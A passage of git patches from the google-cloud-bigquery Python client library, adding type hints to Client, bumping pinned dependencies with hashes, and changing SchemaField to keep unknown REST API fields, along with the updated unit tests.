representation + resource = table.to_api_repr() + self.assertEqual(resource.get("maxStaleness"), "1h") + class Test_row_from_mapping(unittest.TestCase, _SchemaBase): PROJECT = "prahj-ekt" From 40529de923e25c41c6728c121b9c82a042967ada Mon Sep 17 00:00:00 2001 From: Rin Arakaki Date: Wed, 11 Dec 2024 03:15:11 +0900 Subject: [PATCH 039/202] feat: add type hints to Client (#2044) * add type hints * Update client.py Moves import from being used solely during specific checks to being more universally available. * Update google/cloud/bigquery/client.py * Update client.py testing some minor changes to deal with mypy quirks * Update google/cloud/bigquery/client.py --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/client.py | 36 +++++++++++++++++++-------------- 1 file changed, 21 insertions(+), 15 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 97f239f7a..03ded93b1 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -44,6 +44,8 @@ import uuid import warnings +import requests + from google import resumable_media # type: ignore from google.resumable_media.requests import MultipartUpload # type: ignore from google.resumable_media.requests import ResumableUpload @@ -65,6 +67,7 @@ DEFAULT_BQSTORAGE_CLIENT_INFO = None # type: ignore +from google.auth.credentials import Credentials from google.cloud.bigquery._http import Connection from google.cloud.bigquery import _job_helpers from google.cloud.bigquery import _pandas_helpers @@ -126,6 +129,7 @@ _versions_helpers.PANDAS_VERSIONS.try_import() ) # mypy check fails because pandas import is outside module, there are type: ignore comments related to this + ResumableTimeoutType = Union[ None, float, Tuple[float, float] ] # for resumable media methods @@ -133,8 +137,6 @@ if typing.TYPE_CHECKING: # pragma: NO COVER # os.PathLike is only subscriptable in Python 3.9+, thus shielding with a condition. PathType = Union[str, bytes, os.PathLike[str], os.PathLike[bytes]] - import requests # required by api-core - _DEFAULT_CHUNKSIZE = 100 * 1024 * 1024 # 100 MB _MAX_MULTIPART_SIZE = 5 * 1024 * 1024 _DEFAULT_NUM_RETRIES = 6 @@ -231,15 +233,23 @@ class Client(ClientWithProject): def __init__( self, - project=None, - credentials=None, - _http=None, - location=None, - default_query_job_config=None, - default_load_job_config=None, - client_info=None, - client_options=None, + project: Optional[str] = None, + credentials: Optional[Credentials] = None, + _http: Optional[requests.Session] = None, + location: Optional[str] = None, + default_query_job_config: Optional[QueryJobConfig] = None, + default_load_job_config: Optional[LoadJobConfig] = None, + client_info: Optional[google.api_core.client_info.ClientInfo] = None, + client_options: Optional[ + Union[google.api_core.client_options.ClientOptions, Dict[str, Any]] + ] = None, ) -> None: + if client_options is None: + client_options = {} + if isinstance(client_options, dict): + client_options = google.api_core.client_options.from_dict(client_options) + # assert isinstance(client_options, google.api_core.client_options.ClientOptions) + super(Client, self).__init__( project=project, credentials=credentials, @@ -247,14 +257,10 @@ def __init__( _http=_http, ) - kw_args = {"client_info": client_info} + kw_args: Dict[str, Any] = {"client_info": client_info} bq_host = _get_bigquery_host() kw_args["api_endpoint"] = bq_host if bq_host != _DEFAULT_HOST else None client_universe = None - if client_options is None: - client_options = {} - if isinstance(client_options, dict): - client_options = google.api_core.client_options.from_dict(client_options) if client_options.api_endpoint: api_endpoint = client_options.api_endpoint kw_args["api_endpoint"] = api_endpoint From d4d39acb8574f0d06d4e490b859e5fe6b57d0d9e Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Wed, 18 Dec 2024 02:40:17 +0800 Subject: [PATCH 040/202] chore(python): update dependencies in .kokoro/docker/docs (#2088) Source-Link: https://github.com/googleapis/synthtool/commit/e808c98e1ab7eec3df2a95a05331619f7001daef Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:8e3e7e18255c22d1489258d0374c901c01f9c4fd77a12088670cd73d580aa737 Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 +-- .kokoro/docker/docs/requirements.txt | 52 ++++++++++++++++++++++------ 2 files changed, 43 insertions(+), 13 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 6301519a9..26306af66 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:2ed982f884312e4883e01b5ab8af8b6935f0216a5a2d82928d273081fc3be562 -# created: 2024-11-12T12:09:45.821174897Z + digest: sha256:8e3e7e18255c22d1489258d0374c901c01f9c4fd77a12088670cd73d580aa737 +# created: 2024-12-17T00:59:58.625514486Z diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index 8bb076459..f99a5c4aa 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -2,11 +2,11 @@ # This file is autogenerated by pip-compile with Python 3.10 # by the following command: # -# pip-compile --allow-unsafe --generate-hashes requirements.in +# pip-compile --allow-unsafe --generate-hashes synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in # -argcomplete==3.5.1 \ - --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ - --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 +argcomplete==3.5.2 \ + --hash=sha256:036d020d79048a5d525bc63880d7a4b8d1668566b8a76daf1144c0bbe0f63472 \ + --hash=sha256:23146ed7ac4403b70bd6026402468942ceba34a6732255b9edf5b7354f68a6bb # via nox colorlog==6.9.0 \ --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ @@ -23,7 +23,7 @@ filelock==3.16.1 \ nox==2024.10.9 \ --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 - # via -r requirements.in + # via -r synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in packaging==24.2 \ --hash=sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759 \ --hash=sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f @@ -32,11 +32,41 @@ platformdirs==4.3.6 \ --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb # via virtualenv -tomli==2.0.2 \ - --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ - --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed +tomli==2.2.1 \ + --hash=sha256:023aa114dd824ade0100497eb2318602af309e5a55595f76b626d6d9f3b7b0a6 \ + --hash=sha256:02abe224de6ae62c19f090f68da4e27b10af2b93213d36cf44e6e1c5abd19fdd \ + --hash=sha256:286f0ca2ffeeb5b9bd4fcc8d6c330534323ec51b2f52da063b11c502da16f30c \ + --hash=sha256:2d0f2fdd22b02c6d81637a3c95f8cd77f995846af7414c5c4b8d0545afa1bc4b \ + --hash=sha256:33580bccab0338d00994d7f16f4c4ec25b776af3ffaac1ed74e0b3fc95e885a8 \ + --hash=sha256:400e720fe168c0f8521520190686ef8ef033fb19fc493da09779e592861b78c6 \ + --hash=sha256:40741994320b232529c802f8bc86da4e1aa9f413db394617b9a256ae0f9a7f77 \ + --hash=sha256:465af0e0875402f1d226519c9904f37254b3045fc5084697cefb9bdde1ff99ff \ + --hash=sha256:4a8f6e44de52d5e6c657c9fe83b562f5f4256d8ebbfe4ff922c495620a7f6cea \ + --hash=sha256:4e340144ad7ae1533cb897d406382b4b6fede8890a03738ff1683af800d54192 \ + --hash=sha256:678e4fa69e4575eb77d103de3df8a895e1591b48e740211bd1067378c69e8249 \ + --hash=sha256:6972ca9c9cc9f0acaa56a8ca1ff51e7af152a9f87fb64623e31d5c83700080ee \ + --hash=sha256:7fc04e92e1d624a4a63c76474610238576942d6b8950a2d7f908a340494e67e4 \ + --hash=sha256:889f80ef92701b9dbb224e49ec87c645ce5df3fa2cc548664eb8a25e03127a98 \ + --hash=sha256:8d57ca8095a641b8237d5b079147646153d22552f1c637fd3ba7f4b0b29167a8 \ + --hash=sha256:8dd28b3e155b80f4d54beb40a441d366adcfe740969820caf156c019fb5c7ec4 \ + --hash=sha256:9316dc65bed1684c9a98ee68759ceaed29d229e985297003e494aa825ebb0281 \ + --hash=sha256:a198f10c4d1b1375d7687bc25294306e551bf1abfa4eace6650070a5c1ae2744 \ + --hash=sha256:a38aa0308e754b0e3c67e344754dff64999ff9b513e691d0e786265c93583c69 \ + --hash=sha256:a92ef1a44547e894e2a17d24e7557a5e85a9e1d0048b0b5e7541f76c5032cb13 \ + --hash=sha256:ac065718db92ca818f8d6141b5f66369833d4a80a9d74435a268c52bdfa73140 \ + --hash=sha256:b82ebccc8c8a36f2094e969560a1b836758481f3dc360ce9a3277c65f374285e \ + --hash=sha256:c954d2250168d28797dd4e3ac5cf812a406cd5a92674ee4c8f123c889786aa8e \ + --hash=sha256:cb55c73c5f4408779d0cf3eef9f762b9c9f147a77de7b258bef0a5628adc85cc \ + --hash=sha256:cd45e1dc79c835ce60f7404ec8119f2eb06d38b1deba146f07ced3bbc44505ff \ + --hash=sha256:d3f5614314d758649ab2ab3a62d4f2004c825922f9e370b29416484086b264ec \ + --hash=sha256:d920f33822747519673ee656a4b6ac33e382eca9d331c87770faa3eef562aeb2 \ + --hash=sha256:db2b95f9de79181805df90bedc5a5ab4c165e6ec3fe99f970d0e302f384ad222 \ + --hash=sha256:e59e304978767a54663af13c07b3d1af22ddee3bb2fb0618ca1593e4f593a106 \ + --hash=sha256:e85e99945e688e32d5a35c1ff38ed0b3f41f43fad8df0bdf79f72b2ba7bc5272 \ + --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ + --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 # via nox -virtualenv==20.27.1 \ - --hash=sha256:142c6be10212543b32c6c45d3d3893dff89112cc588b7d0879ae5a1ec03a47ba \ - --hash=sha256:f11f1b8a29525562925f745563bfd48b189450f61fb34c4f9cc79dd5aa32a1f4 +virtualenv==20.28.0 \ + --hash=sha256:23eae1b4516ecd610481eda647f3a7c09aea295055337331bb4e6892ecce47b0 \ + --hash=sha256:2c9c3262bb8e7b87ea801d715fae4495e6032450c71d2309be9550e7364049aa # via nox From 887e126bd6128a7ca1d5a7f00abb50ce044d4c6f Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 26 Dec 2024 08:58:58 -0800 Subject: [PATCH 041/202] chore(deps): bump jinja2 from 3.1.4 to 3.1.5 in /.kokoro (#2094) Bumps [jinja2](https://github.com/pallets/jinja) from 3.1.4 to 3.1.5. - [Release notes](https://github.com/pallets/jinja/releases) - [Changelog](https://github.com/pallets/jinja/blob/main/CHANGES.rst) - [Commits](https://github.com/pallets/jinja/compare/3.1.4...3.1.5) --- updated-dependencies: - dependency-name: jinja2 dependency-type: indirect ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- .kokoro/requirements.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.kokoro/requirements.txt b/.kokoro/requirements.txt index 006d8ef93..16db448c1 100644 --- a/.kokoro/requirements.txt +++ b/.kokoro/requirements.txt @@ -254,9 +254,9 @@ jeepney==0.8.0 \ # via # keyring # secretstorage -jinja2==3.1.4 \ - --hash=sha256:4a3aee7acbbe7303aede8e9648d13b8bf88a429282aa6122a993f0ac800cb369 \ - --hash=sha256:bc5dd2abb727a5319567b7a813e6a2e7318c39f4f487cfe6c89c6f9c7d25197d +jinja2==3.1.5 \ + --hash=sha256:8fefff8dc3034e27bb80d67c671eb8a9bc424c0ef4c0826edbff304cceff43bb \ + --hash=sha256:aba0f4dc9ed8013c424088f68a5c226f7d6097ed89b246d7749c2ec4175c6adb # via gcp-releasetool keyring==25.4.1 \ --hash=sha256:5426f817cf7f6f007ba5ec722b1bcad95a75b27d780343772ad76b17cb47b0bf \ From aaf1eb85ada95ab866be0199812ea7f5c7f50766 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Fri, 27 Dec 2024 16:55:01 -0600 Subject: [PATCH 042/202] feat: preserve unknown fields from the REST API representation in `SchemaField` (#2097) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: preserve unknown fields from the REST API representaton in `SchemaField` * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * remove unnecessary variable * remove unused private method * fix pytype --------- Co-authored-by: Owl Bot --- google/cloud/bigquery/schema.py | 82 +++++++++--------------------- tests/unit/job/test_load_config.py | 29 +++++++++-- tests/unit/test_schema.py | 37 +++++++++++--- tests/unit/test_table.py | 32 ++++++++++-- 4 files changed, 105 insertions(+), 75 deletions(-) diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index f5b03cbef..b062396cf 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -16,8 +16,9 @@ import collections import enum -from typing import Any, Dict, Iterable, Optional, Union, cast +from typing import Any, cast, Dict, Iterable, Optional, Union +from google.cloud.bigquery import _helpers from google.cloud.bigquery import standard_sql from google.cloud.bigquery.enums import StandardSqlTypeNames @@ -203,15 +204,8 @@ def __init__( self._properties["rangeElementType"] = {"type": range_element_type} if isinstance(range_element_type, FieldElementType): self._properties["rangeElementType"] = range_element_type.to_api_repr() - - self._fields = tuple(fields) - - @staticmethod - def __get_int(api_repr, name): - v = api_repr.get(name, _DEFAULT_VALUE) - if v is not _DEFAULT_VALUE: - v = int(v) - return v + if fields: # Don't set the property if it's not set. + self._properties["fields"] = [field.to_api_repr() for field in fields] @classmethod def from_api_repr(cls, api_repr: dict) -> "SchemaField": @@ -225,43 +219,19 @@ def from_api_repr(cls, api_repr: dict) -> "SchemaField": Returns: google.cloud.bigquery.schema.SchemaField: The ``SchemaField`` object. """ - field_type = api_repr["type"].upper() - - # Handle optional properties with default values - mode = api_repr.get("mode", "NULLABLE") - description = api_repr.get("description", _DEFAULT_VALUE) - fields = api_repr.get("fields", ()) - policy_tags = api_repr.get("policyTags", _DEFAULT_VALUE) + placeholder = cls("this_will_be_replaced", "PLACEHOLDER") - default_value_expression = api_repr.get("defaultValueExpression", None) + # Note: we don't make a copy of api_repr because this can cause + # unnecessary slowdowns, especially on deeply nested STRUCT / RECORD + # fields. See https://github.com/googleapis/python-bigquery/issues/6 + placeholder._properties = api_repr - if policy_tags is not None and policy_tags is not _DEFAULT_VALUE: - policy_tags = PolicyTagList.from_api_repr(policy_tags) - - if api_repr.get("rangeElementType"): - range_element_type = cast(dict, api_repr.get("rangeElementType")) - element_type = range_element_type.get("type") - else: - element_type = None - - return cls( - field_type=field_type, - fields=[cls.from_api_repr(f) for f in fields], - mode=mode.upper(), - default_value_expression=default_value_expression, - description=description, - name=api_repr["name"], - policy_tags=policy_tags, - precision=cls.__get_int(api_repr, "precision"), - scale=cls.__get_int(api_repr, "scale"), - max_length=cls.__get_int(api_repr, "maxLength"), - range_element_type=element_type, - ) + return placeholder @property def name(self): """str: The name of the field.""" - return self._properties["name"] + return self._properties.get("name", "") @property def field_type(self): @@ -270,7 +240,10 @@ def field_type(self): See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#TableFieldSchema.FIELDS.type """ - return self._properties["type"] + type_ = self._properties.get("type") + if type_ is None: # Shouldn't happen, but some unit tests do this. + return None + return cast(str, type_).upper() @property def mode(self): @@ -279,7 +252,7 @@ def mode(self): See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#TableFieldSchema.FIELDS.mode """ - return self._properties.get("mode") + return cast(str, self._properties.get("mode", "NULLABLE")).upper() @property def is_nullable(self): @@ -299,17 +272,17 @@ def description(self): @property def precision(self): """Optional[int]: Precision (number of digits) for the NUMERIC field.""" - return self._properties.get("precision") + return _helpers._int_or_none(self._properties.get("precision")) @property def scale(self): """Optional[int]: Scale (digits after decimal) for the NUMERIC field.""" - return self._properties.get("scale") + return _helpers._int_or_none(self._properties.get("scale")) @property def max_length(self): """Optional[int]: Maximum length for the STRING or BYTES field.""" - return self._properties.get("maxLength") + return _helpers._int_or_none(self._properties.get("maxLength")) @property def range_element_type(self): @@ -329,7 +302,7 @@ def fields(self): Must be empty unset if ``field_type`` is not 'RECORD'. """ - return self._fields + return tuple(_to_schema_fields(self._properties.get("fields", []))) @property def policy_tags(self): @@ -345,15 +318,10 @@ def to_api_repr(self) -> dict: Returns: Dict: A dictionary representing the SchemaField in a serialized form. """ - answer = self._properties.copy() - - # If this is a RECORD type, then sub-fields are also included, - # add this to the serialized representation. - if self.field_type.upper() in _STRUCT_TYPES: - answer["fields"] = [f.to_api_repr() for f in self.fields] - - # Done; return the serialized dictionary. - return answer + # Note: we don't make a copy of _properties because this can cause + # unnecessary slowdowns, especially on deeply nested STRUCT / RECORD + # fields. See https://github.com/googleapis/python-bigquery/issues/6 + return self._properties def _key(self): """A tuple key that uniquely describes this field. @@ -389,7 +357,7 @@ def _key(self): self.mode.upper(), # pytype: disable=attribute-error self.default_value_expression, self.description, - self._fields, + self.fields, policy_tags, ) diff --git a/tests/unit/job/test_load_config.py b/tests/unit/job/test_load_config.py index becf3e959..3a681c476 100644 --- a/tests/unit/job/test_load_config.py +++ b/tests/unit/job/test_load_config.py @@ -12,6 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. +import copy import warnings import pytest @@ -571,16 +572,34 @@ def test_schema_setter_valid_mappings_list(self): config._properties["load"]["schema"], {"fields": [full_name_repr, age_repr]} ) - def test_schema_setter_invalid_mappings_list(self): + def test_schema_setter_allows_unknown_properties(self): config = self._get_target_class()() schema = [ - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - {"name": "age", "typeoo": "INTEGER", "mode": "REQUIRED"}, + { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + "someNewProperty": "test-value", + }, + { + "name": "age", + # Note: This type should be included, too. Avoid client-side + # validation, as it could prevent backwards-compatible + # evolution of the server-side behavior. + "typo": "INTEGER", + "mode": "REQUIRED", + "anotherNewProperty": "another-test", + }, ] - with self.assertRaises(Exception): - config.schema = schema + # Make sure the setter doesn't mutate schema. + expected_schema = copy.deepcopy(schema) + + config.schema = schema + + # _properties should include all fields, including unknown ones. + assert config._properties["load"]["schema"]["fields"] == expected_schema def test_schema_setter_unsetting_schema(self): from google.cloud.bigquery.schema import SchemaField diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index b17cd0281..4b0b28158 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -12,14 +12,16 @@ # See the License for the specific language governing permissions and # limitations under the License. -from google.cloud import bigquery -from google.cloud.bigquery.standard_sql import StandardSqlStructType -from google.cloud.bigquery.schema import PolicyTagList +import copy import unittest from unittest import mock import pytest +from google.cloud import bigquery +from google.cloud.bigquery.standard_sql import StandardSqlStructType +from google.cloud.bigquery.schema import PolicyTagList + class TestSchemaField(unittest.TestCase): @staticmethod @@ -821,13 +823,32 @@ def test_schema_fields_sequence(self): result = self._call_fut(schema) self.assertEqual(result, schema) - def test_invalid_mapping_representation(self): + def test_unknown_properties(self): schema = [ - {"name": "full_name", "type": "STRING", "mode": "REQUIRED"}, - {"name": "address", "typeooo": "STRING", "mode": "REQUIRED"}, + { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + "someNewProperty": "test-value", + }, + { + "name": "age", + # Note: This type should be included, too. Avoid client-side + # validation, as it could prevent backwards-compatible + # evolution of the server-side behavior. + "typo": "INTEGER", + "mode": "REQUIRED", + "anotherNewProperty": "another-test", + }, ] - with self.assertRaises(Exception): - self._call_fut(schema) + + # Make sure the setter doesn't mutate schema. + expected_schema = copy.deepcopy(schema) + + result = self._call_fut(schema) + + for api_repr, field in zip(expected_schema, result): + assert field.to_api_repr() == api_repr def test_valid_mapping_representation(self): from google.cloud.bigquery.schema import SchemaField diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 3824da226..e9d461e9d 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -12,6 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. +import copy import datetime import logging import re @@ -711,14 +712,35 @@ def test_schema_setter_valid_fields(self): table.schema = [full_name, age] self.assertEqual(table.schema, [full_name, age]) - def test_schema_setter_invalid_mapping_representation(self): + def test_schema_setter_allows_unknown_properties(self): dataset = DatasetReference(self.PROJECT, self.DS_ID) table_ref = dataset.table(self.TABLE_NAME) table = self._make_one(table_ref) - full_name = {"name": "full_name", "type": "STRING", "mode": "REQUIRED"} - invalid_field = {"name": "full_name", "typeooo": "STRING", "mode": "REQUIRED"} - with self.assertRaises(Exception): - table.schema = [full_name, invalid_field] + schema = [ + { + "name": "full_name", + "type": "STRING", + "mode": "REQUIRED", + "someNewProperty": "test-value", + }, + { + "name": "age", + # Note: This type should be included, too. Avoid client-side + # validation, as it could prevent backwards-compatible + # evolution of the server-side behavior. + "typo": "INTEGER", + "mode": "REQUIRED", + "anotherNewProperty": "another-test", + }, + ] + + # Make sure the setter doesn't mutate schema. + expected_schema = copy.deepcopy(schema) + + table.schema = schema + + # _properties should include all fields, including unknown ones. + assert table._properties["schema"]["fields"] == expected_schema def test_schema_setter_valid_mapping_representation(self): from google.cloud.bigquery.schema import SchemaField From 6cbd5c0a49a5f6e289abc747559b3963933fac90 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 2 Jan 2025 23:46:50 +0100 Subject: [PATCH 043/202] chore(deps): update all dependencies (#2096) * chore(deps): update all dependencies * pin attrs===24.2.0 for python 3.7 * pin urllib3===2.2.3 for python 3.8 * pin matplotlib===3.9.2 for python 3.9 --------- Co-authored-by: Lingqing Gan --- .kokoro/docker/docs/requirements.txt | 6 +++--- samples/desktopapp/requirements-test.txt | 4 ++-- samples/geography/requirements-test.txt | 2 +- samples/geography/requirements.txt | 24 +++++++++++++----------- samples/magics/requirements-test.txt | 4 ++-- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements-test.txt | 4 ++-- samples/notebooks/requirements.txt | 5 +++-- samples/snippets/requirements-test.txt | 4 ++-- 9 files changed, 29 insertions(+), 26 deletions(-) diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index f99a5c4aa..fb6ffa272 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -4,9 +4,9 @@ # # pip-compile --allow-unsafe --generate-hashes synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in # -argcomplete==3.5.2 \ - --hash=sha256:036d020d79048a5d525bc63880d7a4b8d1668566b8a76daf1144c0bbe0f63472 \ - --hash=sha256:23146ed7ac4403b70bd6026402468942ceba34a6732255b9edf5b7354f68a6bb +argcomplete==3.5.3 \ + --hash=sha256:2ab2c4a215c59fd6caaff41a869480a23e8f6a5f910b266c1808037f4e375b61 \ + --hash=sha256:c12bf50eded8aebb298c7b7da7a5ff3ee24dffd9f5281867dfe1424b58c55392 # via nox colorlog==6.9.0 \ --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 1640e1a95..827b02dcf 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.4.0 +google-cloud-testutils==1.5.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 1ccebd9cd..ef38acb4f 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index edf5a24b6..ab73dbe87 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,21 +1,22 @@ -attrs==24.2.0 -certifi==2024.8.30 +attrs===24.2.0; python_version == '3.7' +attrs==24.3.0; python_version >= '3.8' +certifi==2024.12.14 cffi===1.15.1; python_version == '3.7' cffi==1.17.1; python_version >= '3.8' -charset-normalizer==3.4.0 -click==8.1.7 +charset-normalizer==3.4.1 +click==8.1.8 click-plugins==1.1.1 cligj==0.7.2 dataclasses==0.8; python_version < '3.7' db-dtypes==1.3.1 Fiona===1.9.6; python_version == '3.7' Fiona==1.10.1; python_version >= '3.8' -geojson==3.1.0 +geojson==3.2.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.23.0 -google-auth==2.36.0 +google-api-core==2.24.0 +google-auth==2.37.0 google-cloud-bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 google-cloud-core==2.4.1 @@ -24,7 +25,7 @@ google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.66.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.68.0; python_version >= '3.8' +grpcio==1.68.1; python_version >= '3.8' idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 @@ -44,7 +45,7 @@ pyasn1-modules==0.4.1; python_version >= '3.8' pycparser===2.21; python_version == '3.7' pycparser==2.22; python_version >= '3.8' pyparsing===3.1.4; python_version < '3.9' -pyparsing==3.2.0; python_version >= '3.9' +pyparsing==3.2.1; python_version >= '3.9' python-dateutil==2.9.0.post0 pytz==2024.2 PyYAML===6.0.1; python_version == '3.7' @@ -53,9 +54,10 @@ requests==2.31.0; python_version == '3.7' requests==2.32.3; python_version >= '3.8' rsa==4.9 Shapely==2.0.6 -six==1.16.0 +six==1.17.0 typing-extensions===4.7.1; python_version == '3.7' typing-extensions==4.12.2; python_version >= '3.8' typing-inspect==0.9.0 urllib3===1.26.18; python_version == '3.7' -urllib3==2.2.3; python_version >= '3.8' +urllib3===2.2.3; python_version == '3.8' +urllib3==2.3.0; python_version >= '3.9' diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 1640e1a95..827b02dcf 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.4.0 +google-cloud-testutils==1.5.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 543d9a512..87efa3dec 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,4 +1,4 @@ -bigquery_magics==0.4.0 +bigquery_magics==0.5.0 db-dtypes==1.3.1 google.cloud.bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 1640e1a95..827b02dcf 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.4.0 +google-cloud-testutils==1.5.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index ca8a0a13e..77103a338 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,4 +1,4 @@ -bigquery-magics==0.4.0 +bigquery-magics==0.5.0 db-dtypes==1.3.1 google-cloud-bigquery==3.27.0 google-cloud-bigquery-storage==2.27.0 @@ -7,7 +7,8 @@ ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' matplotlib===3.5.3; python_version == '3.7' matplotlib===3.7.4; python_version == '3.8' -matplotlib==3.9.2; python_version >= '3.9' +matplotlib===3.9.2; python_version == '3.9' +matplotlib==3.10.0; python_version >= '3.10' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' pandas==2.2.3; python_version >= '3.9' diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index bb0b2a6bf..077e465cf 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" -google-cloud-testutils==1.4.0 +google-cloud-testutils==1.5.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.3; python_version >= '3.8' +pytest==8.3.4; python_version >= '3.8' mock==5.1.0 From cc49760de1bab7a2e45fe9e485daacc4eebae1ef Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 3 Jan 2025 23:01:48 +0100 Subject: [PATCH 044/202] chore(deps): update dependency virtualenv to v20.28.1 (#2101) --- .kokoro/docker/docs/requirements.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index fb6ffa272..48ace5de9 100644 --- a/.kokoro/docker/docs/requirements.txt +++ 